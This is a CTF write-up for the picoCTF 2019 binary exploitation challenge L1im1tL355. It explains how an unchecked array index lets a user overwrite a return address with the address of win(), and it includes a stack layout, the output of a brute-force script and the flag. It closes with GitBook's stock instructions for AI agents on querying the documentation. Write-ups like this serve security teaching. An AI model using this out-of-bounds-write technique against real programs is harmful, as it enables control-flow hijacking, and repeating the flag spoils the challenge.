> For the complete documentation index, see [llms.txt](https://picoctf2019.haydenhousen.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://picoctf2019.haydenhousen.com/binary-exploitation/l1im1tl355.md).

# L1im1tL355

## Problem

> Just pwn this program and get a flag. Its also found in /problems/l1im1tl355\_3\_d7480b654799978caea481ab65d5bbea on the shell server. Source.

* [Program](https://github.com/HHousen/PicoCTF-2019/tree/24b0981c72638c12f9a8572f81e1abbcf8de306d/Binary%20Exploitation/L1im1tL355/vuln/README.md)
* [Source](https://github.com/HHousen/PicoCTF-2019/tree/24b0981c72638c12f9a8572f81e1abbcf8de306d/Binary%20Exploitation/L1im1tL355/vuln.c)

## Solution

1. Looking at the [source code](https://github.com/HHousen/PicoCTF-2019/tree/24b0981c72638c12f9a8572f81e1abbcf8de306d/Binary%20Exploitation/L1im1tL355/vuln.c) I notice the `replaceIntegerInArrayAtIndex()` function looks interesting since it is simply a wrapper around the built-in method of changing an element of an array.
2. This program declares an array on the stack, then allows us to write a DWORD to any array index. If we choose an index between `0` and `666/4` (DWORD is 4 bytes long), we'll end up writing to the array. There are no checks on the index value for the array, so we should be able to go out of bounds and write anywhere to memory. We can input the address of the `win()` function as the "integer value you want to put in the array" and for the  "index in which you want to put the value", we can input the offset from the array to the return address of `replaceIntegerInArrayAtIndex()`.
3. Layout of stack ([source](https://tcode2k16.github.io/blog/posts/picoctf-2019-writeup/binary-exploitation/#l1im1tl355)):

   ```
    lower stack address
    replaceIntegerInArrayAtIndex: stack data
    replaceIntegerInArrayAtIndex: saved ebp
    replaceIntegerInArrayAtIndex: return address (-5)
    main: other stack data
    main: array (+0)
    higher stack address
   ```
4. The script bruteforces the offset and finds it to be `-5`.
5. Run the [script.py](https://github.com/HHousen/PicoCTF-2019/tree/24b0981c72638c12f9a8572f81e1abbcf8de306d/Binary%20Exploitation/L1im1tL355/script.py) `python script.py USER=<username> PASSWORD=<password>`:

   ```
    [*] '/home/<username>/Documents/PicoCTF/Binary Exploitation/L1im1tL355/vuln'
        Arch:     i386-32-little
        RELRO:    Partial RELRO
        Stack:    No canary found
        NX:       NX enabled
        PIE:      No PIE (0x8048000)
    [+] Connecting to 2019shell1.picoctf.com on port 22: Done
    [*] <username>@2019shell1.picoctf.com:
        Distro    Ubuntu 18.04
        OS:       linux
        Arch:     amd64
        Version:  4.15.0
        ASLR:     Enabled
    [+] Opening new channel: 'pwd': Done
    [+] Receiving all data: Done (14B)
    [*] Closed SSH channel with 2019shell1.picoctf.com
    [*] Working directory: '/tmp/tmp.SHO8IvJw16'
    [+] Opening new channel: 'ln -s /home/<username>/* .': Done
    [+] Receiving all data: Done (0B)
    [*] Closed SSH channel with 2019shell1.picoctf.com
    [*] win address: 0x80485c6
    [+] Starting remote process b'/problems/l1im1tl355_3_d7480b654799978caea481ab65d5bbea/vuln' on 2019shell1.picoctf.com: pid 1163772
    [+] Starting remote process b'/problems/l1im1tl355_3_d7480b654799978caea481ab65d5bbea/vuln' on 2019shell1.picoctf.com: pid 1163776
    [+] Starting remote process b'/problems/l1im1tl355_3_d7480b654799978caea481ab65d5bbea/vuln' on 2019shell1.picoctf.com: pid 1163780
    [+] Starting remote process b'/problems/l1im1tl355_3_d7480b654799978caea481ab65d5bbea/vuln' on 2019shell1.picoctf.com: pid 1163784
    [+] Starting remote process b'/problems/l1im1tl355_3_d7480b654799978caea481ab65d5bbea/vuln' on 2019shell1.picoctf.com: pid 1163788
    [+] Starting remote process b'/problems/l1im1tl355_3_d7480b654799978caea481ab65d5bbea/vuln' on 2019shell1.picoctf.com: pid 1163792
    [*] Offset was -5
    [+] picoCTF{str1nG_CH3353_3fe0db39}
   ```

### Flag

`picoCTF{str1nG_CH3353_3fe0db39}`


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://picoctf2019.haydenhousen.com/binary-exploitation/l1im1tl355.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.